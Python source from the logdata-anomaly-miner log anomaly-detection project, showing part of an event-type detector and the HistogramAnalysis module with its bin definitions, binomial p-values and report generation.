"""Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param id_path_list specifies group identifiers for which data should be learned/analyzed. 
One or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id_path_list is set). @param allowed_id_tuples a list of tuples of allowed values (only if id_path_list is set). @param min_num_vals number of the values which the list of stored logline values is being reduced to. @param max_num_vals the maximum list size of the stored logline values before being reduced to the last min_num_values. @param save_values if false the values of the log atom are not saved for further analysis. This disables values and check_variables. """ # avoid "defined outside init" issue self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( mutable_default_args=["id_path_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, id_path_list=id_path_list, allow_missing_id=allow_missing_id, allowed_id_tuples=allowed_id_tuples, min_num_vals=min_num_vals, max_num_vals=max_num_vals, save_values=save_values, log_resource_ignore_list=log_resource_ignore_list ) self.num_events = 0 self.longest_path = [] # List of the longest path of the events self.found_keys = [] # List of the keys corresponding to the events self.variable_key_list = [] # List of the keys, which take values in the log line # List of the values of the log lines. If the length reaches max_num_vals the list gets reduced to min_num_vals values per variable self.values = [] self.num_event_lines = [] # Saves the number of lines of the event types self.total_records = 0 # Saves the number of total log lines # List of the modules which follow the event_type_detector. 
The implemented modules are form the list # [VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector]
        self.following_modules = []
        # List of bools, which state if the variables of variable_key_list are updated.
        self.check_variables = []
        # List of the time trigger. The first list states the times when something should be triggered, the second list states the indices
        # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization)
        # the third list states, the length of the time step (-1 for a one time trigger)
        self.etd_time_trigger = [[], [], []]
        # Reference containing the number of lines of the events for the TSA
        self.num_event_lines_tsa_ref = []
        # Index of the event type of the current log line (-1 after an atom was rejected, see receive_atom)
        self.current_index = 0
        # List of the id tuples; index i belongs to event type i when id_path_list is set
        self.id_path_list_tuples = []
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        self.load_persistence_data()

    def receive_atom(self, log_atom):
        """Receives a parsed atom and keeps track of the event types and the values of the variables of them.

        @param log_atom the parsed atom; its match dictionary defines the event type (by key set and longest path)
        or, when id_path_list is set, the id tuple of the sequence.
        @return True when the atom was assigned to an event type, False when it was skipped (ignored source, no
        target path present, missing or disallowed id tuple). On a skip current_index is set to -1 where noted below.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return False
        self.log_total += 1
        # When target paths are configured, at least one of them must be present in the atom.
        valid_log_atom = False
        if self.target_path_list:
            for path in self.target_path_list:
                if path in log_atom.parser_match.get_match_dictionary().keys():
                    valid_log_atom = True
                    break
        if self.target_path_list and not valid_log_atom:
            self.current_index = -1
            return False
        self.total_records += 1

        # Get the current index, either from the combination of values of the paths of id_path_list, or the event type
        if self.id_path_list:
            # In case that id_path_list is set, use it to differentiate sequences by their id.
            # Otherwise, the empty tuple () is used as the only key of the current_sequences dict.
            id_tuple = ()
            for id_path in self.id_path_list:
                id_match = log_atom.parser_match.get_match_dictionary().get(id_path)
                if id_match is None:
                    if self.allow_missing_id is True:
                        # Insert placeholder for id_path that is not available
                        id_tuple += ("",)
                    else:
                        # Omit log atom if one of the id paths is not found.
                        return False
                else:
                    # Bytes values are decoded so that the tuple compares equal to tuples restored from JSON persistence.
                    if isinstance(id_match.match_object, bytes):
                        id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),)
                    else:
                        id_tuple += (id_match.match_object,)

            # Check if only certain tuples are allowed and if the tuple is included.
            if self.allowed_id_tuples != [] and id_tuple not in self.allowed_id_tuples:
                self.current_index = -1
                return False

            # Searches if the id_tuple has previously appeared
            current_index = -1
            for event_index, var_key in enumerate(self.id_path_list_tuples):
                if id_tuple == var_key:
                    current_index = event_index
        else:
            # Searches if the event type has previously appeared: same longest path and exactly the same key set.
            current_index = -1
            for event_index in range(self.num_events):
                if self.longest_path[event_index] in log_atom.parser_match.get_match_dictionary() and set(
                        log_atom.parser_match.get_match_dictionary()) == self.found_keys[event_index]:
                    current_index = event_index

        # Initialize a new event type if the event type of the new line has not appeared
        if current_index == -1:
            current_index = self.num_events
            self.num_events += 1
            self.found_keys.append(set(log_atom.parser_match.get_match_dictionary().keys()))

            # Initialize the list of the keys to the variables
            self.variable_key_list.append(list(self.found_keys[current_index]))
            # Delete the entries with value None or timestamps as values.
            # Iterated backwards because entries are deleted in place.
            for var_index in range(len(self.variable_key_list[current_index]) - 1, -1, -1):
                if (type(log_atom.parser_match.get_match_dictionary()[self.variable_key_list[current_index][var_index]]).__name__ !=
                        "MatchElement") or (log_atom.parser_match.get_match_dictionary()[self.variable_key_list[
                            current_index][var_index]].match_object is None):
                    del self.variable_key_list[current_index][var_index]
                elif (self.target_path_list is not None) and self.variable_key_list[current_index][var_index] not in self.target_path_list:
                    del self.variable_key_list[current_index][var_index]

            # Initialize the empty lists for the values and initialize the check_variables list for the variables
            if self.save_values:
                self.init_values(current_index)
            self.check_variables.append([True for _ in range(len(self.variable_key_list[current_index]))])
            self.num_event_lines.append(0)

            if not self.id_path_list:
                # String of the longest found path
                self.longest_path.append("")
                # Number of forward slashes in the longest path
                tmp_int = 0
                if self.target_path_list is None:
                    for var_key in self.variable_key_list[current_index]:
                        if var_key is not None:
                            count = var_key.count("/")
                            # Deeper path wins; on equal depth the longer string wins.
                            if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(var_key)):
                                self.longest_path[current_index] = var_key
                                tmp_int = count
                else:
                    for found_key in list(self.found_keys[current_index]):
                        if found_key is None:
                            found_key = ""
                        count = found_key.count("/")
                        if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(found_key)):
                            self.longest_path[current_index] = found_key
                            tmp_int = count
            else:
                self.id_path_list_tuples.append(id_tuple)

        self.current_index = current_index

        if self.save_values:
            # Appends the values to the event type
            self.append_values(log_atom, current_index)
        self.num_event_lines[current_index] += 1
        self.log_success += 1
        return True

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the current time as handed in by the timer.
        @return the number of seconds until the next call is wanted; persists when next_persist_time has passed.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage.

        The layout is positional and must stay in sync with load_persistence_data():
        [found_keys (as lists), variable_key_list, values, longest_path, check_variables, num_event_lines, id_path_list_tuples].
        """
        tmp_list = [[]]
        for key in self.found_keys:
            # Sets are not JSON serializable, so each key set is stored as a list.
            tmp_list[0].append(list(key))
        tmp_list.append(self.variable_key_list)
        tmp_list.append(self.values)
        tmp_list.append(self.longest_path)
        tmp_list.append(self.check_variables)
        tmp_list.append(self.num_event_lines)
        tmp_list.append(self.id_path_list_tuples)
        PersistenceUtil.store_json(self.persistence_file_name, tmp_list)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """Load the persistence data from storage.

        Registers this component with PersistenceUtil and, when a persistence file exists, restores the state written by
        do_persist(). The loaded list is used as-is: there is no shape or type check, so a persistence file from a different
        version or an edited file is trusted without validation.
        """
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for key in persistence_data[0]:
                self.found_keys.append(set(key))
            self.variable_key_list = persistence_data[1]
            self.values = persistence_data[2]
            self.longest_path = persistence_data[3]
            self.check_variables = persistence_data[4]
            self.num_event_lines = persistence_data[5]
            # JSON turns tuples into lists; convert back so that receive_atom's tuple comparison keeps working.
            self.id_path_list_tuples = [tuple(tuple_list) for tuple_list in persistence_data[6]]
            self.num_events = len(self.found_keys)

    def add_following_modules(self, following_module):
        """Add the given Module to the following module list.

        @param following_module the component that consumes the event types and values collected here.
        """
        self.following_modules.append(following_module)
        logging.getLogger(DEBUG_LOG_NAME).debug(
            "%s added following module %s.", self.__class__.__name__, following_module.__class__.__name__)

    def init_values(self, current_index):
        """Initialize the variable_key_list and the list for the values.

        @param current_index the event type index; one empty value list is created per variable key of that event type.
        """
        # Initializes the value list
        if not self.values:
            self.values = [[[] for _ in range(len(self.variable_key_list[current_index]))]]
        else:
            self.values.append([[] for _ in range(len(self.variable_key_list[current_index]))])

    def append_values(self, log_atom, current_index):
        """Add the values of the variables of the current line to self.values.

        @param log_atom the parsed atom providing the match dictionary.
        @param current_index the event type index the atom was assigned to.
        Values are stored as float when convertible, otherwise as the match string. A variable whose key is missing from
        the atom is dropped (its check_variables flag is cleared and its values list emptied). When the value lists
        exceed max_num_vals entries, they are cut back to the last min_num_vals entries.
        """
        for var_index, var_key in enumerate(self.variable_key_list[current_index]):
            # Skips the variable if check_variable is False, or if the var_key is not included in the match_dict
            if not self.check_variables[current_index][var_index]:
                continue
            if var_key not in log_atom.parser_match.get_match_dictionary():
                self.values[current_index][var_index] = []
                self.check_variables[current_index][var_index] = False
                continue
            # repr(...)[2:-1] strips the b'...' wrapper of the bytes representation.
            raw_match_object = ""
            if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytearray):
                raw_match_object = repr(
                    bytes(log_atom.parser_match.get_match_dictionary()[var_key].match_object))[2:-1]
            elif isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytes):
                raw_match_object = repr(log_atom.parser_match.get_match_dictionary()[var_key].match_object)[2:-1]
            # Try to convert the values to floats and add them as values
            try:
                if raw_match_object != "":
                    self.values[current_index][var_index].append(float(raw_match_object))
                else:
                    self.values[current_index][var_index].append(
                        float(log_atom.parser_match.get_match_dictionary()[var_key].match_object))
            # Add the strings as values
            except ValueError:
                if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_string, bytes):
                    self.values[current_index][var_index].append(
                        repr(log_atom.parser_match.get_match_dictionary()[var_key].match_string)[2:-1])
                else:
                    self.values[current_index][var_index].append(log_atom.parser_match.get_match_dictionary()[var_key].match_string)

        # Reduce the numbers of entries in the value list.
        # The length of the first still-checked variable is taken as representative for all of them.
        if len(self.variable_key_list[current_index]) > 0 and len([i for i in self.check_variables[current_index] if i]) > 0 and \
                len(self.values[current_index][self.check_variables[current_index].index(True)]) > self.max_num_vals:
            for var_index in range(len(self.variable_key_list[current_index])):
                # Skips the variable if check_variable is False
                if not self.check_variables[current_index][var_index]:
                    continue
                self.values[current_index][var_index] = self.values[current_index][var_index][-self.min_num_vals:]

    def get_event_type(self, event_index):
        """Return a string which includes information about the event type.

        @param event_index index of the event type.
        @return "<index> (<id tuple>)" when id_path_list is set, else "<index> (<longest path>)".
        """
        if self.id_path_list:
            return_string = str(event_index) + " (" + str(self.id_path_list_tuples[event_index]) + ")"
        else:
            return_string = str(event_index) + " (" + str(self.longest_path[event_index]) + ")"
        return return_string
HistogramAnalysis.py000066400000000000000000000726221500476301700347730ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities.
* Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function moduloTimeBinDefinition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogramAnalysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [("/model/line/time", moduloTimeBinDefinition)], 3600*24*7, # Reporting interval (weekly) anomaly_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atomFilter.addHandler(histogramAnalysis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
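"""
import os
import abc
import logging
from datetime import datetime
import numpy
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer import AminerConfig
from aminer.input.InputInterfaces import AtomHandlerInterface
from scipy import stats, version

# Pick the binomial test offered by the installed scipy. stats.binomtest (scipy >= 1.7) returns a result object
# carrying .pvalue, the older stats.binom_test returns the p-value itself; get_bin_p_value() copes with both.
# Only the (major, minor) components are parsed, so a pre-release suffix in the patch component does not break
# the import, and the comparison is done on the tuple: the former component-wise "major >= 1 and minor >= 7"
# check would have selected binom_test for a hypothetical 2.0 release. When the old function does not exist
# either, binomial_test stays None and reports simply carry no p-values.
binomial_test = None
v = [int(x) for x in version.full_version.split(".")[:2]]
if tuple(v) >= (1, 7):
    binomial_test = stats.binomtest
else:
    binomial_test = getattr(stats, "binom_test", None)

date_string = "%Y-%m-%d %H:%M:%S"


class BinDefinition(metaclass=abc.ABCMeta):
    """This class defines the bins of the histogram."""

    @abc.abstractmethod
    def __init__(self):
        """Initiate the BinDefinition."""

    @abc.abstractmethod
    def has_outlier_bins(self):
        """Report if this binning works with outlier bins, that are bins for all values outside the normal binning range.

        If not, outliers are discarded. When true, the outlier bins are the first and last bin.
        """

    @abc.abstractmethod
    def get_bin_names(self):
        """Get the names of the bins for reporting, including the outlier bins if any."""

    @abc.abstractmethod
    def get_bin(self, value):
        """Get the number of the bin this value should belong to.

        @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the
        bin with outliers below limit, first normal bin is at index 1.
        """

    @abc.abstractmethod
    def get_bin_p_value(self, bin_pos, total_values, bin_values):
        """Calculate a p-Value, how likely the observed number of elements in this bin is.

        This method is used as an interface method, but it also returns a default value.
        @return the value or None when not applicable.
        """
        return None


class LinearNumericBinDefinition(BinDefinition):
    """This class defines the linear numeric bins."""

    def __init__(self, lower_limit, bin_size, bin_count, outlier_bins_flag=False):
        """Create bin_count bins of width bin_size starting at lower_limit.

        @param lower_limit numeric start of the first regular bin.
        @param bin_size width of each regular bin, a positive integer.
        @param bin_count number of regular bins, a positive integer.
        @param outlier_bins_flag when True, values below lower_limit and at or above the last bin end are counted in two
        extra bins at the ends; when False such values get no bin (get_bin returns None).
        @raise TypeError when an argument has the wrong type (bool is rejected for the numeric arguments).
        @raise ValueError when bin_size or bin_count is smaller than 1.
        """
        if isinstance(lower_limit, bool) or not isinstance(lower_limit, (float, int)):
            msg = "lower_limit has to be of the type float or integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if isinstance(bin_size, bool) or not isinstance(bin_size, int):
            msg = "bin_size has to be of the type integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if bin_size < 1:
            msg = "bin_size has to be greater than or equal to 1."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if isinstance(bin_count, bool) or not isinstance(bin_count, int):
            msg = "bin_count has to be of the type integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if bin_count < 1:
            msg = "bin_count has to be greater than or equal to 1."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(outlier_bins_flag, bool):
            msg = "outlier_bins_flag has to be of the type boolean."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.lower_limit = lower_limit
        self.bin_size = bin_size
        self.bin_count = bin_count
        self.outlier_bins_flag = outlier_bins_flag
        # Filled lazily by get_bin_names() and shared by every histogram using this definition.
        self.bin_names = None
        # Probability of a single value landing in a given regular bin under the uniform null hypothesis.
        self.expected_bin_ratio = 1.0 / float(bin_count)

    def has_outlier_bins(self):
        """Report if this binning works with outlier bins, that are bins for all values outside the normal binning range.

        If not, outliers are discarded. When true, the outlier bins are the first and last bin.
        """
        return self.outlier_bins_flag

    def get_bin_names(self):
        """Get the names of the bins for reporting, including the outlier bins if any."""
        # Cache the names here so that multiple histograms using same BinDefinition do not use separate copies of the strings.
        if self.bin_names is not None:
            return self.bin_names
        self.bin_names = []
        if self.outlier_bins_flag:
            self.bin_names.append(f"...-{self.lower_limit}]")
        start = self.lower_limit
        for bin_pos in range(1, self.bin_count + 1):
            end = self.lower_limit + bin_pos * self.bin_size
            self.bin_names.append(f"[{start}-{end}]")
            start = end
        if self.outlier_bins_flag:
            self.bin_names.append(f"[{start}-...")
        return self.bin_names

    def get_bin(self, value):
        """Get the number of the bin this value should belong to.

        @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the
        bin with outliers below limit, first normal bin is at index 1.
        """
        if self.outlier_bins_flag:
            if value < self.lower_limit:
                return 0
            pos = int((value - self.lower_limit) / self.bin_size)
            if pos < self.bin_count:
                # Shift by one because index 0 is the lower outlier bin.
                return pos + 1
            return self.bin_count + 1
        if value < self.lower_limit:
            return None
        pos = int((value - self.lower_limit) / self.bin_size)
        if pos < self.bin_count:
            return pos
        return None

    def get_bin_p_value(self, bin_pos, total_values, bin_values):
        """Calculate a p-Value, how likely the observed number of elements in this bin is.

        @param bin_pos index of the bin in get_bin_names() order.
        @param total_values number of values the test is based on (regular bins only when outlier bins are used).
        @param bin_values number of values observed in this bin.
        @return the value or None when not applicable (no binomial test available, or bin_pos is an outlier bin).
        """
        if binomial_test is None:
            return None
        if self.outlier_bins_flag and (bin_pos == 0 or bin_pos > self.bin_count):
            return None
        p_value = binomial_test(bin_values, total_values, self.expected_bin_ratio)
        # stats.binomtest returns a result object, stats.binom_test a plain float.
        if not isinstance(p_value, (numpy.floating, float)):
            p_value = p_value.pvalue
        return p_value


class ModuloTimeBinDefinition(LinearNumericBinDefinition):
    """This class defines the module time bins."""

    def __init__(self, modulo_value, time_unit, lower_limit, bin_size, bin_count, outlier_bins_flag=False):
        """Create bins over (value % modulo_value) / time_unit.

        @param modulo_value period in seconds the value is reduced to, e.g. 3600*24 for a daily cycle.
        @param time_unit divisor applied to the remainder to get to the reporting unit, e.g. 3600 for hours.
        @param lower_limit start of the first regular bin in reporting units, must not be negative.
        @param bin_size bin width in reporting units.
        @param bin_count number of regular bins.
        @param outlier_bins_flag see LinearNumericBinDefinition.
        @raise TypeError, ValueError as LinearNumericBinDefinition plus the checks on modulo_value, time_unit and lower_limit.
        """
        super(ModuloTimeBinDefinition, self).__init__(lower_limit, bin_size, bin_count, outlier_bins_flag)
        self.modulo_value = modulo_value
        self.time_unit = time_unit
        if isinstance(modulo_value, bool) or not isinstance(modulo_value, (float, int)):
            msg = "modulo_value has to be of the type float or integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if modulo_value <= 0:
            msg = "modulo_value has to be positive and greater than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if isinstance(time_unit, bool) or not isinstance(time_unit, int):
            msg = "time_unit has to be of the type integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if time_unit < 1:
            msg = "time_unit has to be positive and greater than or equal to 1."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if lower_limit < 0:
            msg = "lower_limit has to be positive in ModuloTimeBinDefinition."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

    def get_bin(self, value):
        """Get the number of the bin this value should belong to.

        @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the
        bin with outliers below limit, first normal bin is at index 1.
        """
        if value is None:
            value = 0
        # NOTE(review): bytes and str values are turned into a big-endian integer and binned WITHOUT the modulo/time_unit
        # reduction; only numeric values go through the periodic mapping. Kept as found - confirm this is intended.
        if isinstance(value, bytes):
            value = int.from_bytes(value, "big")
            return super(ModuloTimeBinDefinition, self).get_bin(value)
        if isinstance(value, str):
            value = int.from_bytes(value.encode(), "big")
            return super(ModuloTimeBinDefinition, self).get_bin(value)
        time_value = (value % self.modulo_value) / self.time_unit
        return super(ModuloTimeBinDefinition, self).get_bin(time_value)


class HistogramData:
    """This class defines the properties of one histogram to create and performs the accounting and reporting.

    When the Python scipy package is available, reports will also include probability score created using binomial testing.
    """

    def __init__(self, property_path, bin_definition):
        """Create the histogram data structures.

        @param property_path parser path of the property this histogram counts; must be a non-empty string.
        @param bin_definition the BinDefinition mapping values to bins.
        @raise TypeError, ValueError on invalid arguments.
        """
        if not isinstance(property_path, str):
            msg = "property_path has to be of the type string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(property_path) < 1:
            msg = "property_path must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(bin_definition, BinDefinition):
            msg = "bin_definition has to be of the type BinDefinition."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.property_path = property_path
        self.bin_definition = bin_definition
        self.bin_names = bin_definition.get_bin_names()
        self.bin_data = [0] * (len(self.bin_names))
        self.has_outlier_bins_flag = bin_definition.has_outlier_bins()
        # total_elements counts every binned value, binned_elements only those in regular (non-outlier) bins and is
        # only maintained when outlier bins exist.
        self.total_elements = 0
        self.binned_elements = 0

    def add_value(self, value):
        """Add one value to the histogram.

        @param value a value of the type the bin definition accepts.
        A value outside the binning range goes into an outlier bin when the definition has them; without outlier bins
        get_bin() returns None and the value is discarded without touching any counter (indexing bin_data with None
        used to raise a TypeError here).
        """
        bin_pos = self.bin_definition.get_bin(value)
        if bin_pos is None:
            return
        self.bin_data[bin_pos] += 1
        self.total_elements += 1
        if self.has_outlier_bins_flag and bin_pos != 0 and bin_pos + 1 != len(self.bin_names):
            self.binned_elements += 1

    def reset(self):
        """Remove all values from this histogram."""
        self.total_elements = 0
        self.binned_elements = 0
        self.bin_data = [0] * len(self.bin_data)

    def clone(self):
        """Clone this object so that calls to add_value do not influence the old object anymore.

        This behavior is a mixture of shallow and deep copy: the counters and the bin_data list are copied, the
        bin definition and the bin name list are shared.
        """
        histogram_data = HistogramData(self.property_path, self.bin_definition)
        histogram_data.bin_names = self.bin_names
        histogram_data.bin_data = self.bin_data[:]
        histogram_data.total_elements = self.total_elements
        histogram_data.binned_elements = self.binned_elements
        return histogram_data

    def to_string(self, indent):
        """Get a string representation of this histogram.

        @param indent prefix put in front of every line of the result.
        @return one header line plus one line per non-empty bin with its count, the ratio to all elements and, when the
        bin definition provides one, the binomial p-value.
        """
        result = f'{indent}Property "{self.property_path}" ({self.total_elements} elements):'
        f_elements = float(self.total_elements)
        # With outlier bins the binomial test is only meaningful over the values in regular bins.
        base_element = self.binned_elements if self.has_outlier_bins_flag else self.total_elements
        for bin_pos, count in enumerate(self.bin_data):
            if count == 0:
                continue
            p_value = self.bin_definition.get_bin_p_value(bin_pos, base_element, count)
            if p_value is None:
                result += "\n%s* %s: %d (ratio = %.2e)" % (indent, self.bin_names[bin_pos], count, float(count) / f_elements)
            else:
                result += "\n%s* %s: %d (ratio = %.2e, p = %.2e)" % \
                    (indent, self.bin_names[bin_pos], count, float(count) / f_elements, p_value)
        return result


class HistogramAnalysis(AtomHandlerInterface):
    """This class creates a histogram for one or more properties extracted from a parsed atom."""

    def __init__(self, aminer_config, histogram_definitions, report_interval, anomaly_event_handlers, reset_after_report_flag=True,
                 output_logline=True, log_resource_ignore_list=None):
        """Initialize the analysis component.

        @param aminer_config configuration from analysis_context.
        @param histogram_definitions a list of tuples containing the target property path to analyze and the BinDefinition to apply.
        @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the
        system time. Hence, reports can be delayed when no data is received.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param reset_after_report_flag reset the histogram data after reporting.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param log_resource_ignore_list resource names whose atoms are skipped entirely.
        @raise TypeError when histogram_definitions is not a list of (str, BinDefinition) tuples.
        @raise ValueError when histogram_definitions is empty.
        """
        # avoid "defined outside init" issue
        self.log_success, self.log_total = [None]*2
        super().__init__(
            aminer_config=aminer_config, report_interval=report_interval, anomaly_event_handlers=anomaly_event_handlers,
            reset_after_report_flag=reset_after_report_flag, output_logline=output_logline,
            log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]
        )
        if not isinstance(histogram_definitions, list):
            msg = "histogram_definitions has to be a list of tuples of paths and bin definitions."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        for item in histogram_definitions:
            if not isinstance(item, tuple) or len(item) != 2 or not isinstance(item[0], str) or not isinstance(item[1], BinDefinition):
                msg = "histogram_definitions has to be a list of tuples of paths and bin definitions."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
        if len(histogram_definitions) == 0:
            msg = "histogram_definitions must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.histogram_definitions = histogram_definitions
        self.last_report_time = None
        self.next_report_time = 0.0
        self.histogram_data = []
        for (path, bin_definition) in histogram_definitions:
            self.histogram_data.append(HistogramData(path, bin_definition))

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        Every histogram whose property path occurs in the atom gets the match object as value. Reporting is driven by the
        atom timestamps: the first atom only arms the report timer, later atoms past next_report_time trigger send_report().
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        for data_item in self.histogram_data:
            match = match_dict.get(data_item.property_path, None)
            if match is None:
                continue
            self.log_success += 1
            data_item.add_value(match.match_object)

        timestamp = log_atom.get_timestamp()
        if self.next_report_time < timestamp:
            if self.last_report_time is None:
                self.last_report_time = timestamp
                self.next_report_time = timestamp + self.report_interval
            else:
                self.send_report(log_atom, timestamp)

    def send_report(self, log_atom, timestamp):
        """Send a report to the event handlers.

        @param log_atom the atom that triggered the report; passed through to the handlers.
        @param timestamp end of the reporting period (the atom's timestamp).
        The textual report goes into the first element of the sorted-line list, which is padded to the total number of
        histogram elements; the structured histogram data is delivered in event_data["AnalysisComponent"].
        """
        report_str = "Histogram report "
        if self.last_report_time is not None:
            report_str += f"from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} "
        report_str += f"till {datetime.fromtimestamp(timestamp).strftime(date_string)}"
        affected_log_atom_paths = []
        analysis_component = {"AffectedLogAtomPaths": affected_log_atom_paths}
        for histogramData in self.histogram_data:
            affected_log_atom_paths.append(histogramData.property_path)
        res = []
        h = []
        for data_item in self.histogram_data:
            d = {}
            bins = {}
            i = 0
            while i < len(data_item.bin_names):
                bins[data_item.bin_names[i]] = data_item.bin_data[i]
                i = i + 1
            d["TotalElements"] = data_item.total_elements
            d["BinnedElements"] = data_item.binned_elements
            d["HasOutlierBinsFlag"] = data_item.has_outlier_bins_flag
            d["Bins"] = bins
            if self.output_logline:
                bin_definition = {
                    "Type": str(data_item.bin_definition.__class__.__name__), "LowerLimit": data_item.bin_definition.lower_limit,
                    "BinSize": data_item.bin_definition.bin_size, "BinCount": data_item.bin_definition.bin_count,
                    "OutlierBinsFlag": data_item.bin_definition.outlier_bins_flag, "BinNames": data_item.bin_definition.bin_names,
                    "ExpectedBinRatio": data_item.bin_definition.expected_bin_ratio}
                if isinstance(data_item.bin_definition, ModuloTimeBinDefinition):
                    bin_definition["ModuloValue"] = data_item.bin_definition.modulo_value
                    bin_definition["TimeUnit"] = data_item.bin_definition.time_unit
                d["BinDefinition"] = bin_definition
            d["PropertyPath"] = data_item.property_path
            for line in data_item.to_string(" ").split("\n"):
                report_str += os.linesep + line
            res += [""] * data_item.total_elements
            h.append(d)
        analysis_component["HistogramData"] = h
        analysis_component["ReportInterval"] = self.report_interval
        analysis_component["ResetAfterReportFlag"] = self.reset_after_report_flag
        event_data = {"AnalysisComponent": analysis_component}
        if len(res) > 0:
            res[0] = report_str
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", "Histogram report", res, event_data, log_atom, self)
        if self.reset_after_report_flag:
            for data_item in self.histogram_data:
                data_item.reset()
        self.last_report_time = timestamp
        self.next_report_time = timestamp + self.report_interval
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__)


class PathDependentHistogramAnalysis(AtomHandlerInterface):
    """This class provides a histogram analysis for only one property but separate histograms for each group of correlated match paths.

    Assume there two paths that include the requested property but they separate after the property was found on the path. Then
    objects of this class will produce 3 histograms: one for common path part including all occurences of the target property and one
    for each separate subpath, counting only those property values where the specific subpath was followed.
    """

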